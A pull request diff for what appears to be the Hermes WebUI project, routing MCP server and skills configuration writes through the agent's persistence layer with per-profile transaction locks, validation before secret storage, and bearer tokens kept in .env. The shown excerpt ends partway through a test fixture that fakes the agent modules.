### PR TITLE
fix(config): route MCP and skills config writes through the agent's persistence layer (#6228)

### DIFF
--- a/api/agent_config_bridge.py
+++ b/api/agent_config_bridge.py
@@ -69,6 +69,11 @@ def _probe_import() -> str:
             for required in ("save_config", "load_config", "save_env_value"):
                 if not callable(getattr(_agent_config, required, None)):
                     raise ImportError(f"hermes_cli.config.{required} missing")
+            # Probe the context-var override helpers too — these are called by
+            # scoped_agent_home() in every bridge write path.
+            for attr in ("set_hermes_home_override", "reset_hermes_home_override"):
+                if not callable(getattr(hermes_constants, attr, None)):
+                    raise ImportError(f"hermes_constants.{attr} missing")
             _import_state = "ok"
         except (KeyboardInterrupt, GeneratorExit):
             raise

--- a/api/agent_config_bridge.py
+++ b/api/agent_config_bridge.py
@@ -1,0 +1,211 @@
+"""Shared write path into the Hermes agent's configuration.
+
+The WebUI historically wrote ``config.yaml`` through its own
+``yaml.safe_dump`` serializer (``api.config._save_yaml_config_file``).
+That writer is correct for value round-trips but destroys user comments
+and formatting, skips the agent's ``mcp_security`` validation, and stores
+secrets inline instead of routing them to ``.env``.
+
+This module routes admin writes through the agent's own persistence layer
+(``hermes_cli.config.save_config`` — comment-preserving Ruamel round-trip,
+atomic write, managed-scope aware) when the agent checkout is importable,
+using the context-local Hermes-home override so writes land in the active
+WebUI profile's home without mutating process-global environment.
+
+Fallback behavior is deliberately two-tiered:
+
+- No agent checkout discovered (standalone WebUI deployments, CI): callers
+  keep using the legacy WebUI writer — behavior is unchanged from before
+  this module existed.
+- Agent checkout discovered but the import fails (broken checkout,
+  unsupported layout): raise ``AgentBridgeUnavailable`` instead of silently
+  falling back, so a mis-wired deployment cannot half-apply admin writes.
+"""
+
+from __future__ import annotations
+
+import logging
+import os
+import threading
+from contextlib import contextmanager
+from pathlib import Path
+from typing import Any, Dict, List, Optional
+
+from api.config import _AGENT_DIR
+
+logger = logging.getLogger(__name__)
+
+_import_lock = threading.Lock()
+_import_state: Optional[str] = None  # None=unprobed, "ok", "unavailable:<reason>"
+
+
+class AgentBridgeUnavailable(RuntimeError):
+    """Agent checkout exists but its config layer could not be imported."""
+
+
+def agent_dir_configured() -> bool:
+    """True when an agent checkout was discovered at startup."""
+    return _AGENT_DIR is not None
+
+
+def _probe_import() -> str:
+    """Import the agent config layer once; cache the outcome."""
+    global _import_state
+    if _import_state is not None:
+        return _import_state
+    with _import_lock:
+        if _import_state is not None:
+            return _import_state
+        if os.getenv("HERMES_WEBUI_DISABLE_AGENT_CONFIG_BRIDGE", "").strip().lower() in {"1", "true", "yes", "on"}:
+            _import_state = "unavailable:disabled via HERMES_WEBUI_DISABLE_AGENT_CONFIG_BRIDGE"
+            return _import_state
+        if _AGENT_DIR is None:
+            _import_state = "unavailable:no agent checkout discovered"
+            return _import_state
+        try:
+            import hermes_constants  # noqa: F401
+            from hermes_cli import config as _agent_config  # noqa: F401
+
+            for required in ("save_config", "load_config", "save_env_value"):
+                if not callable(getattr(_agent_config, required, None)):
+                    raise ImportError(f"hermes_cli.config.{required} missing")
+            _import_state = "ok"
+        except (KeyboardInterrupt, GeneratorExit):
+            raise
+        except BaseException as exc:
+            logger.warning("agent config bridge unavailable: %s", exc)
+            _import_state = f"unavailable:{exc}"
+    return _import_state
+
+
+def bridge_available() -> bool:
+    """True when writes can be routed through the agent's persistence layer."""
+    return _probe_import() == "ok"
+
+
+def require_bridge() -> None:
+    """Raise ``AgentBridgeUnavailable`` when an agent checkout exists but the
+    bridge cannot import it. No-op in standalone mode (no checkout at all)
+    and when the operator kill-switch explicitly disabled the bridge."""
+    state = _probe_import()
+    if state == "ok":
+        return
+    if not agent_dir_configured():
+        return
+    if state.startswith("unavailable:disabled via"):
+        return
+    raise AgentBridgeUnavailable(state.split(":", 1)[1] if ":" in state else state)
+
+
+@contextmanager
+def scoped_agent_home(home: Path):
+    """Scope agent-side path resolution to *home* for the current context.
+
+    Uses the agent's context-local override (a ``ContextVar``) so concurrent
+    requests against different WebUI profiles cannot cross-write each other's
+    ``config.yaml``/``.env`` — unlike an ``os.environ`` mutation, which is
+    process-global.
+    """
+    import hermes_constants
+
+    token = hermes_constants.set_hermes_home_override(str(home))
+    try:
+        yield
+    finally:
+        hermes_constants.reset_hermes_home_override(token)
+
+
+# ── config.yaml ──────────────────────────────────────────────────────────────
+
+def load_agent_config(home: Path) -> Dict[str, Any]:
+    from hermes_cli.config import load_config
+
+    with scoped_agent_home(home):
+        return load_config()
+
+
+def save_agent_config(config: Dict[str, Any], home: Path) -> None:
+    """Persist *config* through the agent's comment-preserving writer."""
+    from hermes_cli.config import save_config
+
+    with scoped_agent_home(home):
+        save_config(config)
+
+
+# ── MCP servers ──────────────────────────────────────────────────────────────
+
+def validate_mcp_entry(name: str, entry: Dict[str, Any]) -> List[str]:
+    """Return security-validation issues for one MCP server entry."""
+    from hermes_cli.mcp_security import validate_mcp_server_entry
+
+    return list(validate_mcp_server_entry(name, entry) or [])
+
+
+def save_mcp_server(name: str, server_config: Dict[str, Any], home: Path) -> List[str]:
+    """Validate and persist one MCP server. Returns issues; empty on success."""
+    issues = validate_mcp_entry(name, server_config)
+    if issues:
+        return issues
+    from hermes_cli.config import load_config, save_config
+
+    with scoped_agent_home(home):
+        config = load_config()
+        config.setdefault("mcp_servers", {})[name] = server_config
+        save_config(config)
+    return []
+
+
+def remove_mcp_server(name: str, home: Path) -> bool:
+    """Remove one MCP server. Returns True when it existed."""
+    from hermes_cli.config import load_config, save_config
+
+    with scoped_agent_home(home):
+        config = load_config()
+        servers = config.get("mcp_servers", {})
+        if not isinstance(servers, dict) or name not in servers:
+            return False
+        del servers[name]
+        if servers:
+            config["mcp_servers"] = servers
+        else:
+            config.pop("mcp_servers", None)
+        save_config(config)
+    return True
+
+
+def set_mcp_server_enabled(name: str, enabled: bool, home: Path) -> bool:
+    """Flip one server's ``enabled`` flag. Returns False when it is missing."""
+    from hermes_cli.config import load_config, save_config
+
+    with scoped_agent_home(home):
+        config = load_config()
+        servers = config.get("mcp_servers", {})
+        if not isinstance(servers, dict) or not isinstance(servers.get(name), dict):
+            return False
+        servers[name]["enabled"] = bool(enabled)
+        config["mcp_servers"] = servers
+        save_config(config)
+    return True
+
+
+def save_mcp_bearer_token(name: str, token: str, home: Path) -> Dict[str, str]:
+    """Store a bearer token in the profile's ``.env`` and return the header
+    template (``Authorization: Bearer ${MCP_<NAME>_API_KEY}``) to persist in
+    ``config.yaml`` — matching the agent CLI/Dashboard convention so secrets
+    never land in YAML."""
+    from hermes_cli.mcp_config import _save_bearer_auth_token
+
+    with scoped_agent_home(home):
+        return _save_bearer_auth_token(name, token)
+
+
+# ── skills config (enable/disable lists) ─────────────────────────────────────
+
+def save_skills_config(skills_cfg: Dict[str, Any], home: Path) -> None:
+    """Persist the ``skills`` section (disabled / platform_disabled lists)."""
+    from hermes_cli.config import load_config, save_config
+
+    with scoped_agent_home(home):
+        config = load_config()
+        config["skills"] = skills_cfg
+        save_config(config)

--- a/api/agent_config_bridge.py
+++ b/api/agent_config_bridge.py
@@ -120,6 +120,38 @@ def scoped_agent_home(home: Path):
         hermes_constants.reset_hermes_home_override(token)
 
 
+# ── per-authority transaction locks ──────────────────────────────────────────
+
+# Serializes the FULL read-modify-write transaction (authoritative read →
+# masked-value merge/mutation → validation → secret/config persistence) per
+# config authority/home.  Without it, two request threads can read the same
+# snapshot and silently lose one independent mutation via last-writer-wins.
+_tx_locks: Dict[str, threading.RLock] = {}
+_tx_locks_guard = threading.Lock()
+
+
+def _tx_lock_for(home: Path) -> threading.RLock:
+    key = str(home)
+    with _tx_locks_guard:
+        lock = _tx_locks.get(key)
+        if lock is None:
+            lock = threading.RLock()
+            _tx_locks[key] = lock
+        return lock
+
+
+@contextmanager
+def config_transaction(home: Path):
+    """Serialize the full authoritative read → masked-value merge/mutation →
+    validation → secret/config persistence transaction for one config
+    authority/home. Reentrant, so a route can hold the lock across a
+    multi-step transaction while nested bridge calls (save_mcp_server and
+    friends) re-acquire it safely on the same thread.
+    """
+    with _tx_lock_for(home):
+        yield
+
+
 # ── config.yaml ──────────────────────────────────────────────────────────────
 
 def load_agent_config(home: Path) -> Dict[str, Any]:
@@ -146,14 +178,27 @@ def validate_mcp_entry(name: str, entry: Dict[str, Any]) -> List[str]:
     return list(validate_mcp_server_entry(name, entry) or [])
 
 
+def build_mcp_bearer_header(name: str) -> Dict[str, str]:
+    """Build the Authorization header template WITHOUT persisting anything.
+
+    Mirrors the agent CLI/Dashboard convention (secret lives in ``.env``,
+    template in ``config.yaml``) so a route can validate the complete
+    candidate entry — including the header template — before any secret is
+    written to disk.
+    """
+    from hermes_cli.mcp_config import _bearer_auth_headers
+
+    return _bearer_auth_headers(name)
+
+
 def save_mcp_server(name: str, server_config: Dict[str, Any], home: Path) -> List[str]:
     """Validate and persist one MCP server. Returns issues; empty on success."""
-    issues = validate_mcp_entry(name, server_config)
-    if issues:
-        return issues
     from hermes_cli.config import load_config, save_config
 
-    with scoped_agent_home(home):
+    with _tx_lock_for(home), scoped_agent_home(home):
+        issues = validate_mcp_entry(name, server_config)
+        if issues:
+            return issues
         config = load_config()
         config.setdefault("mcp_servers", {})[name] = server_config
         save_config(config)
@@ -164,7 +209,7 @@ def remove_mcp_server(name: str, home: Path) -> bool:
     """Remove one MCP server. Returns True when it existed."""
     from hermes_cli.config import load_config, save_config
 
-    with scoped_agent_home(home):
+    with _tx_lock_for(home), scoped_agent_home(home):
         config = load_config()
         servers = config.get("mcp_servers", {})
         if not isinstance(servers, dict) or name not in servers:
@@ -182,7 +227,7 @@ def set_mcp_server_enabled(name: str, enabled: bool, home: Path) -> bool:
     """Flip one server's ``enabled`` flag. Returns False when it is missing."""
     from hermes_cli.config import load_config, save_config
 
-    with scoped_agent_home(home):
+    with _tx_lock_for(home), scoped_agent_home(home):
         config = load_config()
         servers = config.get("mcp_servers", {})
         if not isinstance(servers, dict) or not isinstance(servers.get(name), dict):
@@ -210,7 +255,7 @@ def save_skills_config(skills_cfg: Dict[str, Any], home: Path) -> None:
     """Persist the ``skills`` section (disabled / platform_disabled lists)."""
     from hermes_cli.config import load_config, save_config
 
-    with scoped_agent_home(home):
+    with _tx_lock_for(home), scoped_agent_home(home):
         config = load_config()
         config["skills"] = skills_cfg
         save_config(config)

--- a/api/routes.py
+++ b/api/routes.py
@@ -26394,11 +26394,12 @@ def _handle_mcp_servers_list(handler):
         _server_summary(name, scfg, runtime.get(str(name)))
         for name, scfg in servers.items()
     ]
+    caps = _mcp_write_capability()
     return j(handler, {
         "servers": result,
-        "toggle_supported": True,
+        "toggle_supported": caps.get("writable", True),
         "reload_required": True,
-        **_mcp_write_capability(),
+        **caps,
     })
 
 
@@ -26413,7 +26414,21 @@ def _mcp_bridge_or_legacy(handler):
     from api import agent_config_bridge as _bridge
 
     if _bridge.bridge_available():
-        return True, get_active_hermes_home()
+        home = get_active_hermes_home()
+        # The WebUI's _get_config_path() honors HERMES_CONFIG_PATH — an env-var
+        # override that can point to a config file *outside* the active profile
+        # home.  The Agent's save_config() always writes to
+        # <override-home>/config.yaml and does NOT check HERMES_CONFIG_PATH.
+        # When the env override is set and diverges, fall back to legacy mode so
+        # GET and mutation stay in sync on the same file.  Otherwise a bridge
+        # write would silently mutate <home>/config.yaml while GET returns the
+        # external override file — a data-integrity split.
+        cfg_path_override = os.getenv("HERMES_CONFIG_PATH", "").strip()
+        if cfg_path_override:
+            agent_default_path = Path(home) / "config.yaml"
+            if os.path.expanduser(cfg_path_override) != str(agent_default_path):
+                return False, None
+        return True, home
     try:
         _bridge.require_bridge()
     except _bridge.AgentBridgeUnavailable as exc:

--- a/api/routes.py
+++ b/api/routes.py
@@ -25133,6 +25133,30 @@ def _handle_skill_toggle(handler, body):
     if not skill_md:
         return bad(handler, f"Skill '{name}' not found", 404)
 
+    from api import agent_config_bridge as _bridge
+
+    if _bridge.bridge_available():
+        home = get_active_hermes_home()
+        with _cfg_lock:
+            cfg = _bridge.load_agent_config(home)
+            skills_cfg = cfg.get("skills") if isinstance(cfg.get("skills"), dict) else {}
+            skills_cfg["disabled"] = _toggle_name_in_list(
+                skills_cfg.get("disabled"), name, enabled
+            )
+            platform_disabled = skills_cfg.get("platform_disabled")
+            if isinstance(platform_disabled, dict) and "webui" in platform_disabled:
+                platform_disabled["webui"] = _toggle_name_in_list(
+                    platform_disabled["webui"], name, enabled
+                )
+            _bridge.save_skills_config(skills_cfg, home)
+        reload_config()
+        _SKILLS_STATS_CACHE.clear()
+        return j(handler, {"ok": True, "name": name, "enabled": enabled})
+    try:
+        _bridge.require_bridge()
+    except _bridge.AgentBridgeUnavailable as exc:
+        return j(handler, {"error": f"Agent config layer unavailable: {exc}"}, status=503)
+
     config_path = _active_profile_config_path()
     with _cfg_lock:
         cfg = _load_yaml_config_file(config_path)
@@ -26340,6 +26364,25 @@ def _handle_notes_item(handler, parsed):
         return j(handler, {"source": "joplin", "error": str(exc)}, status=502)
 
 
+def _mcp_write_capability() -> dict:
+    """Report whether MCP config writes (add/edit/delete/toggle) can succeed
+    right now, for the frontend to disable write controls instead of letting
+    them fail. Mirrors the same fail-closed check ``_mcp_bridge_or_legacy``
+    performs before a write: an agent checkout that IS configured but whose
+    config layer failed to import must not offer write buttons that would
+    just 503 (a half-wired deployment problem, distinct from "no checkout at
+    all", which writes fine through the legacy YAML path)."""
+    from api import agent_config_bridge as _bridge
+
+    if _bridge.bridge_available():
+        return {"writable": True}
+    try:
+        _bridge.require_bridge()
+    except _bridge.AgentBridgeUnavailable as exc:
+        return {"writable": False, "unavailable_reason": str(exc)}
+    return {"writable": True}
+
+
 def _handle_mcp_servers_list(handler):
     """List configured MCP servers with safe, read-only runtime visibility."""
     cfg = get_config_for_profile_home(get_active_hermes_home())
@@ -26355,7 +26398,28 @@ def _handle_mcp_servers_list(handler):
         "servers": result,
         "toggle_supported": True,
         "reload_required": True,
+        **_mcp_write_capability(),
     })
+
+
+def _mcp_bridge_or_legacy(handler):
+    """Resolve the MCP write path for this request.
+
+    Returns ``(use_bridge, home)`` or ``None`` after answering the request
+    when the agent checkout is configured but not importable (fail closed —
+    a half-wired deployment must not silently fall back to the legacy
+    comment-destroying writer).
+    """
+    from api import agent_config_bridge as _bridge
+
+    if _bridge.bridge_available():
+        return True, get_active_hermes_home()
+    try:
+        _bridge.require_bridge()
+    except _bridge.AgentBridgeUnavailable as exc:
+        j(handler, {"error": f"Agent config layer unavailable: {exc}"}, status=503)
+        return None
+    return False, None
 
 
 def _handle_mcp_server_delete(handler, name):
@@ -26364,6 +26428,17 @@ def _handle_mcp_server_delete(handler, name):
     name = unquote(name)
     if not name:
         return bad(handler, "name is required")
+    route = _mcp_bridge_or_legacy(handler)
+    if route is None:
+        return True
+    use_bridge, home = route
+    if use_bridge:
+        from api import agent_config_bridge as _bridge
+
+        if not _bridge.remove_mcp_server(name, home):
+            return bad(handler, f"MCP server '{name}' not found", 404)
+        reload_config()
+        return j(handler, {"ok": True, "deleted": name})
     cfg = get_config()
     servers = cfg.get("mcp_servers", {})
     if not isinstance(servers, dict):
@@ -26386,6 +26461,17 @@ def _handle_mcp_server_toggle(handler, name, body):
     if "enabled" not in body:
         return bad(handler, "enabled field is required")
     enabled = bool(body["enabled"])
+    route = _mcp_bridge_or_legacy(handler)
+    if route is None:
+        return True
+    use_bridge, home = route
+    if use_bridge:
+        from api import agent_config_bridge as _bridge
+
+        if not _bridge.set_mcp_server_enabled(name, enabled, home):
+            return bad(handler, f"MCP server '{name}' not found", 404)
+        reload_config()
+        return j(handler, {"ok": True, "name": name, "enabled": enabled})
     cfg = get_config()
     servers = cfg.get("mcp_servers", {})
     if not isinstance(servers, dict):
@@ -26427,13 +26513,36 @@ def _handle_mcp_server_update(handler, name, body):
     name = unquote(name)
     if not name:
         return bad(handler, "name is required")
+    route = _mcp_bridge_or_legacy(handler)
+    if route is None:
+        return True
+    use_bridge, home = route
     # Validate: must have url (http) or command (stdio)
     server_cfg = {}
-    cfg = get_config()
-    servers = cfg.get("mcp_servers", {})
-    if not isinstance(servers, dict):
-        servers = {}
-    existing_cfg = servers.get(name, {})
+    if use_bridge:
+        from api import agent_config_bridge as _bridge
+
+        # Read the existing server through the SAME home-scoped bridge
+        # reader the write path below uses — not the WebUI's own get_config()
+        # cache. The two can diverge (different profile resolution, stale
+        # in-memory cache), which would make _strip_masked_values() below
+        # miss the real header/env value and silently persist the literal
+        # •••••• placeholder as the "secret" instead of preserving the
+        # original (a quiet secret loss, not a leak).
+        try:
+            agent_cfg = _bridge.load_agent_config(home)
+        except Exception as exc:
+            return bad(handler, f"Failed to read existing server config: {exc}", 502)
+        agent_servers = agent_cfg.get("mcp_servers", {})
+        if not isinstance(agent_servers, dict):
+            agent_servers = {}
+        existing_cfg = agent_servers.get(name, {})
+    else:
+        cfg = get_config()
+        servers = cfg.get("mcp_servers", {})
+        if not isinstance(servers, dict):
+            servers = {}
+        existing_cfg = servers.get(name, {})
     if body.get("url"):
         server_cfg["url"] = body["url"].strip()
         if body.get("headers"):
@@ -26451,6 +26560,27 @@ def _handle_mcp_server_update(handler, name, body):
             server_cfg["timeout"] = int(body["timeout"])
         except (ValueError, TypeError):
             pass
+    if use_bridge:
+        from api import agent_config_bridge as _bridge
+
+        bearer_token = str(body.get("bearer_token") or "").strip()
+        if bearer_token and bearer_token != _MASKED_PLACEHOLDER:
+            # Secret goes to the profile's .env; config.yaml only stores the
+            # ${MCP_<NAME>_API_KEY} interpolation template (agent convention).
+            try:
+                token_headers = _bridge.save_mcp_bearer_token(name, bearer_token, home)
+            except ValueError as exc:
+                return bad(handler, str(exc))
+            merged_headers = dict(server_cfg.get("headers") or {})
+            merged_headers.update(token_headers)
+            server_cfg["headers"] = merged_headers
+        issues = _bridge.save_mcp_server(name, server_cfg, home)
+        if issues:
+            return j(handler, {"error": "Server configuration rejected", "issues": issues}, status=400)
+        reload_config()
+        return j(handler, {"ok": True, "server": _server_summary(name, server_cfg)})
+    if body.get("bearer_token"):
+        return bad(handler, "bearer_token requires a Hermes agent checkout (set HERMES_WEBUI_AGENT_DIR); use headers instead")
     servers[name] = server_cfg
     cfg["mcp_servers"] = servers
     _save_yaml_config_file(_get_config_path(), cfg)

--- a/api/routes.py
+++ b/api/routes.py
@@ -25137,7 +25137,10 @@ def _handle_skill_toggle(handler, body):
 
     if _bridge.bridge_available():
         home = get_active_hermes_home()
-        with _cfg_lock:
+        # Full read → masked merge/mutation → persistence under the lock
+        # keyed to this config authority/home, so a concurrent skills or MCP
+        # mutation targeting the same authority cannot be lost.
+        with _bridge.config_transaction(home):
             cfg = _bridge.load_agent_config(home)
             skills_cfg = cfg.get("skills") if isinstance(cfg.get("skills"), dict) else {}
             skills_cfg["disabled"] = _toggle_name_in_list(
@@ -26454,15 +26457,18 @@ def _handle_mcp_server_delete(handler, name):
             return bad(handler, f"MCP server '{name}' not found", 404)
         reload_config()
         return j(handler, {"ok": True, "deleted": name})
-    cfg = get_config()
-    servers = cfg.get("mcp_servers", {})
-    if not isinstance(servers, dict):
-        servers = {}
-    if name not in servers:
-        return bad(handler, f"MCP server '{name}' not found", 404)
-    del servers[name]
-    cfg["mcp_servers"] = servers
-    _save_yaml_config_file(_get_config_path(), cfg)
+    # Legacy fallback — serialize the read-modify-write under the WebUI's
+    # global config lock (the same lock the bridge path keys per home).
+    with _cfg_lock:
+        cfg = get_config()
+        servers = cfg.get("mcp_servers", {})
+        if not isinstance(servers, dict):
+            servers = {}
+        if name not in servers:
+            return bad(handler, f"MCP server '{name}' not found", 404)
+        del servers[name]
+        cfg["mcp_servers"] = servers
+        _save_yaml_config_file(_get_config_path(), cfg)
     reload_config()
     return j(handler, {"ok": True, "deleted": name})
 
@@ -26487,17 +26493,20 @@ def _handle_mcp_server_toggle(handler, name, body):
             return bad(handler, f"MCP server '{name}' not found", 404)
         reload_config()
         return j(handler, {"ok": True, "name": name, "enabled": enabled})
-    cfg = get_config()
-    servers = cfg.get("mcp_servers", {})
-    if not isinstance(servers, dict):
-        servers = {}
-    if name not in servers:
-        return bad(handler, f"MCP server '{name}' not found", 404)
-    if not isinstance(servers[name], dict):
-        return bad(handler, f"MCP server '{name}' has invalid config", 400)
-    servers[name]["enabled"] = enabled
-    cfg["mcp_servers"] = servers
-    _save_yaml_config_file(_get_config_path(), cfg)
+    # Legacy fallback — serialize the read-modify-write under the WebUI's
+    # global config lock (the same lock the bridge path keys per home).
+    with _cfg_lock:
+        cfg = get_config()
+        servers = cfg.get("mcp_servers", {})
+        if not isinstance(servers, dict):
+            servers = {}
+        if name not in servers:
+            return bad(handler, f"MCP server '{name}' not found", 404)
+        if not isinstance(servers[name], dict):
+            return bad(handler, f"MCP server '{name}' has invalid config", 400)
+        servers[name]["enabled"] = enabled
+        cfg["mcp_servers"] = servers
+        _save_yaml_config_file(_get_config_path(), cfg)
     reload_config()
     return j(handler, {"ok": True, "name": name, "enabled": enabled})
 
@@ -26532,32 +26541,93 @@ def _handle_mcp_server_update(handler, name, body):
     if route is None:
         return True
     use_bridge, home = route
-    # Validate: must have url (http) or command (stdio)
-    server_cfg = {}
     if use_bridge:
         from api import agent_config_bridge as _bridge
 
-        # Read the existing server through the SAME home-scoped bridge
-        # reader the write path below uses — not the WebUI's own get_config()
-        # cache. The two can diverge (different profile resolution, stale
-        # in-memory cache), which would make _strip_masked_values() below
-        # miss the real header/env value and silently persist the literal
-        # •••••• placeholder as the "secret" instead of preserving the
-        # original (a quiet secret loss, not a leak).
-        try:
-            agent_cfg = _bridge.load_agent_config(home)
-        except Exception as exc:
-            return bad(handler, f"Failed to read existing server config: {exc}", 502)
-        agent_servers = agent_cfg.get("mcp_servers", {})
-        if not isinstance(agent_servers, dict):
-            agent_servers = {}
-        existing_cfg = agent_servers.get(name, {})
-    else:
+        # The FULL read → masked-value merge → validation → secret/config
+        # persistence transaction runs under one lock keyed to the active
+        # config authority/home, so two concurrent writers cannot read the
+        # same snapshot and silently drop one independent mutation.
+        with _bridge.config_transaction(home):
+            # Read the existing server through the SAME home-scoped bridge
+            # reader the write path below uses — not the WebUI's own get_config()
+            # cache. The two can diverge (different profile resolution, stale
+            # in-memory cache), which would make _strip_masked_values() below
+            # miss the real header/env value and silently persist the literal
+            # •••••• placeholder as the "secret" instead of preserving the
+            # original (a quiet secret loss, not a leak).
+            try:
+                agent_cfg = _bridge.load_agent_config(home)
+            except Exception as exc:
+                return bad(handler, f"Failed to read existing server config: {exc}", 502)
+            agent_servers = agent_cfg.get("mcp_servers", {})
+            if not isinstance(agent_servers, dict):
+                agent_servers = {}
+            existing_cfg = agent_servers.get(name, {})
+
+            server_cfg = _build_mcp_server_cfg(body, existing_cfg)
+            if server_cfg is None:
+                return bad(handler, "url or command is required")
+
+            bearer_token = str(body.get("bearer_token") or "").strip()
+            has_new_token = bool(bearer_token) and bearer_token != _MASKED_PLACEHOLDER
+            if has_new_token:
+                # Build the candidate header template WITHOUT writing the
+                # token: the secret must not touch the profile .env until the
+                # complete candidate entry has passed MCP security validation.
+                token_headers = _bridge.build_mcp_bearer_header(name)
+                merged_headers = dict(server_cfg.get("headers") or {})
+                merged_headers.update(token_headers)
+                server_cfg["headers"] = merged_headers
+
+            # Validate the COMPLETE candidate entry before any persistence —
+            # a rejected entry leaves both .env and config.yaml byte-identical.
+            issues = _bridge.validate_mcp_entry(name, server_cfg)
+            if issues:
+                return j(handler, {"error": "Server configuration rejected", "issues": issues}, status=400)
+
+            # Validation passed — now persist the secret (if any) and the
+            # config. save_mcp_server() keeps its own validation at the
+            # persistence boundary as a final fail-closed gate.
+            if has_new_token:
+                try:
+                    token_headers = _bridge.save_mcp_bearer_token(name, bearer_token, home)
+                except ValueError as exc:
+                    return bad(handler, str(exc))
+                merged_headers = dict(server_cfg.get("headers") or {})
+                merged_headers.update(token_headers)
+                server_cfg["headers"] = merged_headers
+            issues = _bridge.save_mcp_server(name, server_cfg, home)
+            if issues:
+                return j(handler, {"error": "Server configuration rejected", "issues": issues}, status=400)
+        reload_config()
+        return j(handler, {"ok": True, "server": _server_summary(name, server_cfg)})
+
+    # Legacy fallback — serialize under the WebUI's global config lock so the
+    # read-modify-write cannot interleave with another legacy writer.
+    with _cfg_lock:
         cfg = get_config()
         servers = cfg.get("mcp_servers", {})
         if not isinstance(servers, dict):
             servers = {}
         existing_cfg = servers.get(name, {})
+        server_cfg = _build_mcp_server_cfg(body, existing_cfg)
+        if server_cfg is None:
+            return bad(handler, "url or command is required")
+        if body.get("bearer_token"):
+            return bad(handler, "bearer_token requires a Hermes agent checkout (set HERMES_WEBUI_AGENT_DIR); use headers instead")
+        servers[name] = server_cfg
+        cfg["mcp_servers"] = servers
+        _save_yaml_config_file(_get_config_path(), cfg)
+    reload_config()
+    return j(handler, {"ok": True, "server": _server_summary(name, server_cfg)})
+
+
+def _build_mcp_server_cfg(body, existing_cfg):
+    """Build the candidate MCP server entry from a PUT body, resolving masked
+    placeholder values against *existing_cfg*. Returns None when neither
+    ``url`` nor ``command`` was supplied."""
+    server_cfg = {}
     if body.get("url"):
         server_cfg["url"] = body["url"].strip()
         if body.get("headers"):
@@ -26569,35 +26639,10 @@ def _handle_mcp_server_update(handler, name, body):
         if body.get("env"):
             server_cfg["env"] = _strip_masked_values(body["env"], existing_cfg.get("env", {}))
     else:
-        return bad(handler, "url or command is required")
+        return None
     if body.get("timeout") is not None:
         try:
             server_cfg["timeout"] = int(body["timeout"])
         except (ValueError, TypeError):
             pass
-    if use_bridge:
-        from api import agent_config_bridge as _bridge
-
-        bearer_token = str(body.get("bearer_token") or "").strip()
-        if bearer_token and bearer_token != _MASKED_PLACEHOLDER:
-            # Secret goes to the profile's .env; config.yaml only stores the
-            # ${MCP_<NAME>_API_KEY} interpolation template (agent convention).
-            try:
-                token_headers = _bridge.save_mcp_bearer_token(name, bearer_token, home)
-            except ValueError as exc:
-                return bad(handler, str(exc))
-            merged_headers = dict(server_cfg.get("headers") or {})
-            merged_headers.update(token_headers)
-            server_cfg["headers"] = merged_headers
-        issues = _bridge.save_mcp_server(name, server_cfg, home)
-        if issues:
-            return j(handler, {"error": "Server configuration rejected", "issues": issues}, status=400)
-        reload_config()
-        return j(handler, {"ok": True, "server": _server_summary(name, server_cfg)})
-    if body.get("bearer_token"):
-        return bad(handler, "bearer_token requires a Hermes agent checkout (set HERMES_WEBUI_AGENT_DIR); use headers instead")
-    servers[name] = server_cfg
-    cfg["mcp_servers"] = servers
-    _save_yaml_config_file(_get_config_path(), cfg)
-    reload_config()
-    return j(handler, {"ok": True, "server": _server_summary(name, server_cfg)})
+    return server_cfg

--- a/tests/conftest.py
+++ b/tests/conftest.py
@@ -51,6 +51,11 @@ REPO_ROOT  = TESTS_DIR.parent.resolve()
 HOME       = pathlib.Path.home()
 HERMES_HOME = pathlib.Path(os.getenv('HERMES_HOME', str(HOME / '.hermes')))
 
+# Disable the agent-config bridge process-wide so the full test suite is
+# machine-independent (no hermes-agent checkout required). Individual tests
+# that exercise bridge code paths activate their own fake via sys.modules.
+os.environ.setdefault("HERMES_WEBUI_DISABLE_AGENT_CONFIG_BRIDGE", "1")
+
 # ── Test server config ────────────────────────────────────────────────────
 # Port and state dir auto-derive from the repo path when no env var is set,
 # giving every worktree its own isolated port (20000-29999) and state directory.

--- a/tests/test_agent_config_bridge.py
+++ b/tests/test_agent_config_bridge.py
@@ -1,0 +1,274 @@
+"""Tests for api.agent_config_bridge — the agent persistence bridge module.
+
+These tests fake the hermes_cli.config and hermes_constants modules in
+sys.modules so they work identically on CI (no agent checkout) and dev
+machines (real checkout) without importing a real agent.
+"""
+
+import os
+import sys
+import types
+from pathlib import Path
+from unittest.mock import patch
+
+import pytest
+
+from api import agent_config_bridge as bridge
+
+# ── Test fixtures ────────────────────────────────────────────────────────────
+
+
+@pytest.fixture
+def fake_agent_modules(monkeypatch, tmp_path):
+    """Install fake hermes_cli.config + hermes_constants in sys.modules.
+
+    Returns the mutable state dict so tests can inspect what was saved.
+    """
+    state = {"config": {}, "saved_configs": [], "env_values": {}, "home_override_stack": []}
+
+    hermes_constants = types.ModuleType("hermes_constants")
+
+    def _set_hermes_home_override(path):
+        state["home_override_stack"].append(Path(path))
+        return object()
+
+    def _reset_hermes_home_override(token):
+        if state["home_override_stack"]:
+            state["home_override_stack"].pop()
+        return None
+
+    hermes_constants.set_hermes_home_override = _set_hermes_home_override
+    hermes_constants.reset_hermes_home_override = _reset_hermes_home_override
+
+    config_mod = types.ModuleType("hermes_cli.config")
+
+    def _load_config():
+        return {k: v for k, v in state["config"].items()}
+
+    def _save_config(config, **kwargs):
+        state["config"] = dict(config)
+        state["saved_configs"].append(dict(config))
+
+    def _save_env_value(key, value):
+        state["env_values"][key] = value
+
+    config_mod.load_config = _load_config
+    config_mod.save_config = _save_config
+    config_mod.save_env_value = _save_env_value
+
+    hermes_cli = types.ModuleType("hermes_cli")
+    hermes_cli.__path__ = []
+
+    # Suppress the environment disable env var that conftest sets
+    monkeypatch.delenv("HERMES_WEBUI_DISABLE_AGENT_CONFIG_BRIDGE", raising=False)
+    monkeypatch.setitem(sys.modules, "hermes_constants", hermes_constants)
+    monkeypatch.setitem(sys.modules, "hermes_cli", hermes_cli)
+    monkeypatch.setitem(sys.modules, "hermes_cli.config", config_mod)
+    monkeypatch.setattr(bridge, "_AGENT_DIR", str(tmp_path / "agent"), raising=False)
+    monkeypatch.setattr(bridge, "_import_state", None, raising=False)
+
+    try:
+        yield state
+    finally:
+        bridge._import_state = None
+        # Tear down in reverse order
+        for mod in ("hermes_cli.config", "hermes_cli", "hermes_constants"):
+            monkeypatch.delitem(sys.modules, mod, raising=False)
+
+
+@pytest.fixture
+def fake_security_modules(monkeypatch):
+    """Install fake hermes_cli.mcp_security module."""
